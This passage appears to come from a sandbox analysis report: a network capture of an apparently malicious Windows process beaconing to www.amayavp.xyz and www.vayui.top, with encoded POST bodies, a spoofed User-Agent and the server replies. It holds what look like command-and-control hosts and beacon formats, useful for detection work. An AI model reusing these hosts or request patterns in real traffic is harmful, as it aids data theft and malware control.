                                                                Nov 27, 2024 08:55:08.993829012 CET752OUTPOST /d9ku/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US
                                                                Host: www.amayavp.xyz
                                                                Origin: http://www.amayavp.xyz
                                                                Referer: http://www.amayavp.xyz/d9ku/
                                                                Cache-Control: no-cache
                                                                Content-Length: 208
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                Data Raw: 36 64 72 3d 6c 43 4f 75 5a 30 70 64 4d 4e 79 74 5a 57 4a 61 48 49 4b 66 4d 46 42 50 74 47 64 6d 78 6d 69 75 48 54 31 74 42 76 37 55 58 41 6c 63 6d 52 6f 59 75 43 61 68 63 33 63 46 51 57 71 72 41 30 4a 31 74 50 72 44 4e 43 50 61 69 4d 51 67 72 4e 5a 34 6c 74 4e 4b 4b 63 6e 6c 74 70 71 61 42 7a 39 4d 37 75 53 67 68 6e 55 6c 37 49 49 6e 64 4d 78 44 45 46 70 30 48 74 51 34 44 51 4e 70 6b 59 7a 62 38 4b 7a 6b 6b 6a 6c 4c 57 78 53 41 77 71 4b 37 6c 76 41 46 44 5a 45 6c 64 75 58 6d 36 45 42 6d 74 5a 4a 74 5a 33 7a 4b 2f 72 38 71 7a 4a 37 4f 78 46 42 52 4e 57 51 31 56 6c 31 39 50 6f 47 34 45 54 6f 33 4c 63 77 32 44 6a 31 51
                                                                Data Ascii: 6dr=lCOuZ0pdMNytZWJaHIKfMFBPtGdmxmiuHT1tBv7UXAlcmRoYuCahc3cFQWqrA0J1tPrDNCPaiMQgrNZ4ltNKKcnltpqaBz9M7uSghnUl7IIndMxDEFp0HtQ4DQNpkYzb8KzkkjlLWxSAwqK7lvAFDZElduXm6EBmtZJtZ3zK/r8qzJ7OxFBRNWQ1Vl19PoG4ETo3Lcw2Dj1Q
                                                                Nov 27, 2024 08:55:10.226185083 CET686INHTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Wed, 27 Nov 2024 07:55:10 GMT
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                Cache-Control: no-cache
                                                                Content-Encoding: br
                                                                Data Raw: 31 62 63 0d 0a a1 f0 19 00 20 ff af a9 a7 2b 8f 2e 79 b2 1c 1f 25 06 bb f6 a9 b9 75 a2 90 bd 3b 70 4e d4 89 4e 35 b2 c1 37 4b 4e 1c f0 84 cb a3 6e 76 b0 83 de e6 9a 3d fb 13 a4 1e 1c 73 6b 04 d2 25 81 29 3b 3d d4 2a 05 f0 93 8a f6 0c 93 c2 fa 05 ef 2f 30 2a 9b e2 c6 4c f9 72 2e 65 39 c1 c8 59 04 0e e0 94 37 9f df 85 f3 43 46 04 9c 13 d1 a1 46 90 2a e3 dd 81 c3 92 76 34 52 84 fc 43 dc f7 ff 53 24 9e fc 36 20 07 b8 56 9c f9 fc a6 ce 44 c6 ec 1a 4d eb fa f9 b9 14 8a fe d2 df d3 bf 98 cc 8d b9 9e cf ed ee 52 87 6f 08 e6 a9 37 18 d3 b6 91 45 bb e9 de b7 bd 68 87 21 f1 a1 09 22 55 ba cf f6 f7 25 96 b8 81 31 09 2f 8e 13 68 10 44 6a d9 65 6f 48 e4 7f bd 3d 6b 00 fa 0f dc 56 00 95 d5 4e 6a 1b 45 b1 4b b5 ca 6b 95 40 a6 5d 05 5a 56 29 26 b4 b2 79 ad f3 24 4d eb d8 7b 9f ab 3a d1 3a cd b5 04 1d 43 0e 55 aa db b9 1c a0 fa 71 3b 73 b9 d2 10 a5 69 15 43 94 82 4e 41 b7 1d 24 d2 81 ca 64 1a 8d b8 70 93 7a db e8 09 60 ca e0 df df a5 5f 2c 0d 0e 91 86 08 76 fe fa fe 83 3b 5f cf 77 d3 65 50 d3 98 5a 5a 11 12 e2 02 45 [TRUNCATED]
                                                                Data Ascii: 1bc +.y%u;pNN57KNnv=sk%);=*/0*Lr.e9Y7CFF*v4RCS$6 VDMRo7Eh!"U%1/hDjeoH=kVNjEKk@]ZV)&y$M{::CUq;siCNA$dpz`_,v;_wePZZE]QD,P4U7up|+q3}Ps_(eGQIK#Jj[!DR|y0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                14192.168.2.649990185.27.134.144804872C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 27, 2024 08:55:11.659991026 CET776OUTPOST /d9ku/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US
                                                                Host: www.amayavp.xyz
                                                                Origin: http://www.amayavp.xyz
                                                                Referer: http://www.amayavp.xyz/d9ku/
                                                                Cache-Control: no-cache
                                                                Content-Length: 232
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                Data Raw: 36 64 72 3d 6c 43 4f 75 5a 30 70 64 4d 4e 79 74 59 32 35 61 43 76 2b 66 4b 6c 42 4d 6a 6d 64 6d 6e 57 69 71 48 54 4a 74 42 75 2f 45 58 7a 42 63 6e 78 59 59 74 44 61 68 53 58 63 46 62 32 71 55 64 6b 4a 75 74 50 58 78 4e 42 58 61 69 4d 55 67 72 4d 70 34 6c 65 31 4a 4a 73 6e 6e 6b 4a 71 59 65 44 39 4d 37 75 53 67 68 6e 52 79 37 49 51 6e 64 38 42 44 45 6b 70 7a 47 74 51 2f 4a 77 4e 70 32 6f 7a 66 38 4b 7a 47 6b 69 35 31 57 33 57 41 77 72 36 37 67 72 73 47 57 70 45 6a 41 2b 57 44 2b 6d 42 73 67 61 45 61 59 6e 62 7a 6e 72 64 4d 2f 66 6d 55 74 32 42 79 66 47 77 33 56 6e 74 50 50 49 47 53 47 54 51 33 5a 4c 38 52 4d 58 51 7a 44 58 65 48 48 49 44 53 59 70 73 4e 38 54 55 55 49 4d 71 73 69 41 3d 3d
                                                                Data Ascii: 6dr=lCOuZ0pdMNytY25aCv+fKlBMjmdmnWiqHTJtBu/EXzBcnxYYtDahSXcFb2qUdkJutPXxNBXaiMUgrMp4le1JJsnnkJqYeD9M7uSghnRy7IQnd8BDEkpzGtQ/JwNp2ozf8KzGki51W3WAwr67grsGWpEjA+WD+mBsgaEaYnbznrdM/fmUt2ByfGw3VntPPIGSGTQ3ZL8RMXQzDXeHHIDSYpsN8TUUIMqsiA==
                                                                Nov 27, 2024 08:55:12.937143087 CET686INHTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Wed, 27 Nov 2024 07:55:12 GMT
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                Cache-Control: no-cache
                                                                Content-Encoding: br
                                                                Data Raw: 31 62 63 0d 0a a1 f0 19 00 20 ff af a9 a7 2b 8f 2e 79 b2 1c 1f 25 06 bb f6 a9 b9 75 a2 90 bd 3b 70 4e d4 89 4e 35 b2 c1 37 4b 4e 1c f0 84 cb a3 6e 76 b0 83 de e6 9a 3d fb 13 a4 1e 1c 73 6b 04 d2 25 81 29 3b 3d d4 2a 05 f0 93 8a f6 0c 93 c2 fa 05 ef 2f 30 2a 9b e2 c6 4c f9 72 2e 65 39 c1 c8 59 04 0e e0 94 37 9f df 85 f3 43 46 04 9c 13 d1 a1 46 90 2a e3 dd 81 c3 92 76 34 52 84 fc 43 dc f7 ff 53 24 9e fc 36 20 07 b8 56 9c f9 fc a6 ce 44 c6 ec 1a 4d eb fa f9 b9 14 8a fe d2 df d3 bf 98 cc 8d b9 9e cf ed ee 52 87 6f 08 e6 a9 37 18 d3 b6 91 45 bb e9 de b7 bd 68 87 21 f1 a1 09 22 55 ba cf f6 f7 25 96 b8 81 31 09 2f 8e 13 68 10 44 6a d9 65 6f 48 e4 7f bd 3d 6b 00 fa 0f dc 56 00 95 d5 4e 6a 1b 45 b1 4b b5 ca 6b 95 40 a6 5d 05 5a 56 29 26 b4 b2 79 ad f3 24 4d eb d8 7b 9f ab 3a d1 3a cd b5 04 1d 43 0e 55 aa db b9 1c a0 fa 71 3b 73 b9 d2 10 a5 69 15 43 94 82 4e 41 b7 1d 24 d2 81 ca 64 1a 8d b8 70 93 7a db e8 09 60 ca e0 df df a5 5f 2c 0d 0e 91 86 08 76 fe fa fe 83 3b 5f cf 77 d3 65 50 d3 98 5a 5a 11 12 e2 02 45 [TRUNCATED]
                                                                Data Ascii: 1bc +.y%u;pNN57KNnv=sk%);=*/0*Lr.e9Y7CFF*v4RCS$6 VDMRo7Eh!"U%1/hDjeoH=kVNjEKk@]ZV)&y$M{::CUq;siCNA$dpz`_,v;_wePZZE]QD,P4U7up|+q3}Ps_(eGQIK#Jj[!DR|y0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                15192.168.2.649997185.27.134.144804872C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 27, 2024 08:55:14.328850985 CET1789OUTPOST /d9ku/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US
                                                                Host: www.amayavp.xyz
                                                                Origin: http://www.amayavp.xyz
                                                                Referer: http://www.amayavp.xyz/d9ku/
                                                                Cache-Control: no-cache
                                                                Content-Length: 1244
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                Data Raw: 36 64 72 3d 6c 43 4f 75 5a 30 70 64 4d 4e 79 74 59 32 35 61 43 76 2b 66 4b 6c 42 4d 6a 6d 64 6d 6e 57 69 71 48 54 4a 74 42 75 2f 45 58 7a 4a 63 6e 43 67 59 74 6b 4f 68 54 58 63 46 48 6d 71 56 64 6b 4a 76 74 50 2b 34 4e 47 66 73 69 50 67 67 35 65 68 34 6a 76 31 4a 65 38 6e 6e 6d 4a 71 62 42 7a 38 49 37 75 43 6b 68 6d 68 79 37 49 51 6e 64 36 6c 44 55 6c 70 7a 45 74 51 34 44 51 4e 31 6b 59 7a 6e 38 4b 62 73 6b 69 73 4f 57 47 71 41 7a 4c 71 37 6e 4f 41 47 4b 35 45 68 54 4f 57 68 2b 6d 4d 32 67 61 5a 68 59 6e 66 5a 6e 6f 42 4d 37 36 62 74 2b 6b 6f 71 4d 30 34 36 4a 67 5a 66 4c 4e 4b 64 4a 68 45 63 50 59 51 64 4d 6a 55 4c 64 78 69 2f 4f 62 4f 42 50 71 38 48 34 6d 6f 46 4d 64 76 47 2f 58 66 77 37 47 78 4f 4b 4f 6e 4c 34 34 54 66 79 7a 30 4f 32 46 75 46 39 46 49 33 6f 4f 62 4e 76 57 30 45 4d 68 74 49 2f 6b 30 59 76 55 2f 75 73 70 78 4b 66 38 7a 6b 75 33 78 5a 30 48 4c 37 63 47 4b 42 42 4f 43 67 50 67 45 52 4a 30 31 48 34 70 31 50 6f 68 72 35 44 50 69 63 30 35 57 6d 53 34 4d 6c 69 45 31 50 55 52 62 4e 77 4c [TRUNCATED]
                                                                Data Ascii: 6dr=lCOuZ0pdMNytY25aCv+fKlBMjmdmnWiqHTJtBu/EXzJcnCgYtkOhTXcFHmqVdkJvtP+4NGfsiPgg5eh4jv1Je8nnmJqbBz8I7uCkhmhy7IQnd6lDUlpzEtQ4DQN1kYzn8KbskisOWGqAzLq7nOAGK5EhTOWh+mM2gaZhYnfZnoBM76bt+koqM046JgZfLNKdJhEcPYQdMjULdxi/ObOBPq8H4moFMdvG/Xfw7GxOKOnL44Tfyz0O2FuF9FI3oObNvW0EMhtI/k0YvU/uspxKf8zku3xZ0HL7cGKBBOCgPgERJ01H4p1Pohr5DPic05WmS4MliE1PURbNwLb4+v3luudp1eVm8Z+hBR1UA+Vx9kd0InlU/ubXsTFLsGfAfMxglHyP2JMGGAjbSEUn+Gp+q1dhzheBam1FM3/UNEjEtfYSd1DZe9HvvBbvnRYV68emK7nB9VqLXAWyIDdhBLS/2GGhN1j5iO/rfNTpNQq26shWS56sENSYNM+KNmCSLI4JJmRGRRezZab27LT98ZlzlA3haNOhdId0gvar0SR41ySZ8B1Ld5yV3btKTEhYesPoQFlM2TrILYlkuxrs5xzlmFDs2U5yxLrGqkUnXkUof1CKJi5UC02OJH6VllL7myyShso9sHboLnr2V/kAsaiBwnzCFYHuCcE+gUnYB2Cb5Xdf/+SZzqy98OyxFx6w/heolYXZA+cTUF5TevRl/IUFNM0XNDcyC7xKyA/Tdpkkf/9UTHFSGw4rdFfj5Eroa2HhAbRyb/JcXeYE3eW8hAOBLv0XUDUQ3BEextylIBbZySz69OTkRSnaUr/0niUaibxxdqFkoQuPfvVplkQdYjjESM1TBGhUw6tBTrpaYpaaQ7j4bbi7vuvQGFSFTITyma1CJuPfufUDGyMlTVZ+SW0x+enjN4jcHbY7Dk5suAdzPT5jWj8r9kcRHNjSkwa3TZcPRc3meejHttt8OuPYi25a4WyZL5oXudsjmLh+ms7hcTU33jwH [TRUNCATED]
                                                                Nov 27, 2024 08:55:15.609050035 CET686INHTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Wed, 27 Nov 2024 07:55:15 GMT
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                Cache-Control: no-cache
                                                                Content-Encoding: br
                                                                Data Raw: 31 62 63 0d 0a a1 f0 19 00 20 ff af a9 a7 2b 8f 2e 79 b2 1c 1f 25 06 bb f6 a9 b9 75 a2 90 bd 3b 70 4e d4 89 4e 35 b2 c1 37 4b 4e 1c f0 84 cb a3 6e 76 b0 83 de e6 9a 3d fb 13 a4 1e 1c 73 6b 04 d2 25 81 29 3b 3d d4 2a 05 f0 93 8a f6 0c 93 c2 fa 05 ef 2f 30 2a 9b e2 c6 4c f9 72 2e 65 39 c1 c8 59 04 0e e0 94 37 9f df 85 f3 43 46 04 9c 13 d1 a1 46 90 2a e3 dd 81 c3 92 76 34 52 84 fc 43 dc f7 ff 53 24 9e fc 36 20 07 b8 56 9c f9 fc a6 ce 44 c6 ec 1a 4d eb fa f9 b9 14 8a fe d2 df d3 bf 98 cc 8d b9 9e cf ed ee 52 87 6f 08 e6 a9 37 18 d3 b6 91 45 bb e9 de b7 bd 68 87 21 f1 a1 09 22 55 ba cf f6 f7 25 96 b8 81 31 09 2f 8e 13 68 10 44 6a d9 65 6f 48 e4 7f bd 3d 6b 00 fa 0f dc 56 00 95 d5 4e 6a 1b 45 b1 4b b5 ca 6b 95 40 a6 5d 05 5a 56 29 26 b4 b2 79 ad f3 24 4d eb d8 7b 9f ab 3a d1 3a cd b5 04 1d 43 0e 55 aa db b9 1c a0 fa 71 3b 73 b9 d2 10 a5 69 15 43 94 82 4e 41 b7 1d 24 d2 81 ca 64 1a 8d b8 70 93 7a db e8 09 60 ca e0 df df a5 5f 2c 0d 0e 91 86 08 76 fe fa fe 83 3b 5f cf 77 d3 65 50 d3 98 5a 5a 11 12 e2 02 45 [TRUNCATED]
                                                                Data Ascii: 1bc +.y%u;pNN57KNnv=sk%);=*/0*Lr.e9Y7CFF*v4RCS$6 VDMRo7Eh!"U%1/hDjeoH=kVNjEKk@]ZV)&y$M{::CUq;siCNA$dpz`_,v;_wePZZE]QD,P4U7up|+q3}Ps_(eGQIK#Jj[!DR|y0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                16192.168.2.650003185.27.134.144804872C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 27, 2024 08:55:16.996102095 CET497OUTGET /d9ku/?6dr=oAmOaC9rLcmuYnVpEIiUFnJetHEZs2+IPEF+P87/UiJAxykznzqhXWsXbleaaytX5cXBA3Pvgu1YuM8etO94J8e6gZfcDjEsysW5sV4r35t/PcxyDEU8Ed58PWAzm7Gn7pjmnX0=&Kp=6N8LUn6pGPW HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-US
                                                                Host: www.amayavp.xyz
                                                                Connection: close
                                                                User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                Nov 27, 2024 08:55:18.327203989 CET1188INHTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Wed, 27 Nov 2024 07:55:18 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 987
                                                                Connection: close
                                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                Cache-Control: no-cache
                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 61 65 73 2e 6a 73 22 20 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 74 6f 4e 75 6d 62 65 72 73 28 64 29 7b 76 61 72 20 65 3d 5b 5d 3b 64 2e 72 65 70 6c 61 63 65 28 2f 28 2e 2e 29 2f 67 2c 66 75 6e 63 74 69 6f 6e 28 64 29 7b 65 2e 70 75 73 68 28 70 61 72 73 65 49 6e 74 28 64 2c 31 36 29 29 7d 29 3b 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 74 6f 48 65 78 28 29 7b 66 6f 72 28 76 61 72 20 64 3d 5b 5d 2c 64 3d 31 3d 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 61 72 67 75 6d 65 6e 74 73 5b 30 5d 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 41 72 72 61 79 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 61 72 67 75 6d 65 6e 74 73 2c 65 3d 22 22 2c 66 3d 30 3b 66 3c 64 2e 6c 65 6e 67 74 68 3b 66 2b 2b 29 65 2b 3d 28 31 36 3e 64 5b 66 5d 3f 22 30 22 3a 22 22 29 2b 64 5b 66 5d 2e 74 6f 53 74 72 69 6e 67 28 31 36 [TRUNCATED]
                                                                Data Ascii: <html><body><script type="text/javascript" src="/aes.js" ></script><script>function toNumbers(d){var e=[];d.replace(/(..)/g,function(d){e.push(parseInt(d,16))});return e}function toHex(){for(var d=[],d=1==arguments.length&&arguments[0].constructor==Array?arguments[0]:arguments,e="",f=0;f<d.length;f++)e+=(16>d[f]?"0":"")+d[f].toString(16);return e.toLowerCase()}var a=toNumbers("f655ba9d09a112d4968c63579db590b4"),b=toNumbers("98344c2eee86c3994890592585b49f80"),c=toNumbers("f7d8695144b251459459fd530d567041");document.cookie="__test="+toHex(slowAES.decrypt(c,2,a,b))+"; expires=Thu, 31-Dec-37 23:55:55 GMT; path=/"; location.href="http://www.amayavp.xyz/d9ku/?6dr=oAmOaC9rLcmuYnVpEIiUFnJetHEZs2+IPEF+P87/UiJAxykznzqhXWsXbleaaytX5cXBA3Pvgu1YuM8etO94J8e6gZfcDjEsysW5sV4r35t/PcxyDEU8Ed58PWAzm7Gn7pjmnX0=&Kp=6N8LUn6pGPW&i=1";</script><noscript>This site requires Javascript to work, please enable Javascript in your browser or use a browser with Javascript support</noscript></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                17192.168.2.650006172.67.145.234804872C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 27, 2024 08:55:24.187865973 CET746OUTPOST /vg0z/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US
                                                                Host: www.vayui.top
                                                                Origin: http://www.vayui.top
                                                                Referer: http://www.vayui.top/vg0z/
                                                                Cache-Control: no-cache
                                                                Content-Length: 208
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                Data Raw: 36 64 72 3d 32 37 47 45 30 57 34 36 48 49 4c 61 57 71 56 57 64 4e 35 42 6a 6a 4b 4f 39 47 43 38 73 4d 57 78 4d 39 69 44 32 34 50 5a 2f 53 43 30 51 43 58 38 57 6b 6a 58 38 43 72 30 72 4c 50 41 41 44 70 47 6e 57 6b 65 7a 56 4d 4b 39 39 64 7a 37 32 56 5a 30 32 64 6b 51 61 43 4b 33 72 34 61 56 6a 59 70 73 69 4f 37 55 67 6a 6c 56 6f 69 62 46 34 7a 55 65 2b 61 39 76 77 59 48 6a 52 4f 6c 75 35 41 67 5a 75 77 4b 66 4f 41 43 45 5a 61 76 37 65 51 51 2f 50 66 61 58 4c 4a 37 36 69 43 2b 54 33 42 44 56 33 62 79 4f 36 79 71 2b 43 5a 48 7a 65 58 5a 79 33 31 77 4d 4a 67 6b 45 68 41 44 58 6b 43 6c 72 5a 4a 43 4a 72 4e 37 37 71 34 30
                                                                Data Ascii: 6dr=27GE0W46HILaWqVWdN5BjjKO9GC8sMWxM9iD24PZ/SC0QCX8WkjX8Cr0rLPAADpGnWkezVMK99dz72VZ02dkQaCK3r4aVjYpsiO7UgjlVoibF4zUe+a9vwYHjROlu5AgZuwKfOACEZav7eQQ/PfaXLJ76iC+T3BDV3byO6yq+CZHzeXZy31wMJgkEhADXkClrZJCJrN77q40
                                                                Nov 27, 2024 08:55:25.328429937 CET910INHTTP/1.1 404 Not Found
                                                                Date: Wed, 27 Nov 2024 07:55:25 GMT
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uNuHMovBEZ%2Bn4NWml1LVp5qOBo5m8swT6H3kMl8%2BA4ZcgInj26eny%2FXEWCtRl0%2BbSaaqMYKUrjZ1rI%2FPCvibsl5teb9X6HHENPrIwx3lttsuN2YUZugFJKT1v0krYDwr"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8e908e497dec4388-EWR
                                                                Content-Encoding: gzip
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1638&min_rtt=1638&rtt_var=819&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=746&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                18192.168.2.650007172.67.145.234804872C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 27, 2024 08:55:26.934150934 CET770OUTPOST /vg0z/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US
                                                                Host: www.vayui.top
                                                                Origin: http://www.vayui.top
                                                                Referer: http://www.vayui.top/vg0z/
                                                                Cache-Control: no-cache
                                                                Content-Length: 232
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                Data Raw: 36 64 72 3d 32 37 47 45 30 57 34 36 48 49 4c 61 57 4b 46 57 66 71 56 42 72 6a 4b 52 68 57 43 38 69 73 58 5a 4d 39 75 44 32 39 76 4a 2f 68 6d 30 51 6d 62 38 59 46 6a 58 31 53 72 30 6b 72 50 59 4f 6a 70 50 6e 57 59 38 7a 58 49 4b 39 35 4e 7a 37 30 4e 5a 30 6e 64 6c 53 4b 43 45 73 62 34 63 62 44 59 70 73 69 4f 37 55 6b 4b 74 56 70 4b 62 46 49 44 55 65 66 61 2b 77 41 59 47 69 52 4f 6c 2f 70 41 6b 5a 75 78 5a 66 4b 42 6e 45 62 69 76 37 61 63 51 2b 64 33 5a 65 4c 4a 35 35 53 44 39 44 55 30 6d 62 32 43 65 43 38 36 38 76 79 6c 73 37 49 4b 44 75 45 31 54 65 5a 41 6d 45 6a 59 78 58 45 43 50 70 5a 78 43 62 38 42 63 30 65 64 58 6d 42 4a 4f 6f 53 46 32 78 4b 50 72 7a 30 55 6c 79 48 6b 71 46 51 3d 3d
                                                                Data Ascii: 6dr=27GE0W46HILaWKFWfqVBrjKRhWC8isXZM9uD29vJ/hm0Qmb8YFjX1Sr0krPYOjpPnWY8zXIK95Nz70NZ0ndlSKCEsb4cbDYpsiO7UkKtVpKbFIDUefa+wAYGiROl/pAkZuxZfKBnEbiv7acQ+d3ZeLJ55SD9DU0mb2CeC868vyls7IKDuE1TeZAmEjYxXECPpZxCb8Bc0edXmBJOoSF2xKPrz0UlyHkqFQ==
                                                                Nov 27, 2024 08:55:28.174063921 CET893INHTTP/1.1 404 Not Found
                                                                Date: Wed, 27 Nov 2024 07:55:28 GMT
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NoxhpH51T1yxFOujIFCghAtMu40ZpYJulPcksZgpzYC27g0QtQa91iDPgFY9rXCeVtvVjr07y3SYmFTqniHeE%2BteVMzsxWDv1%2F%2BqTs70%2BAtlyVrK10yIYHKZe3B3o04p"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8e908e5b38e443a7-EWR
                                                                Content-Encoding: gzip
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2033&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=770&delivery_rate=0&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a 36 33 0d 0a b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: f63(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                19192.168.2.650008172.67.145.234804872C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                TimestampBytes transferredDirectionData
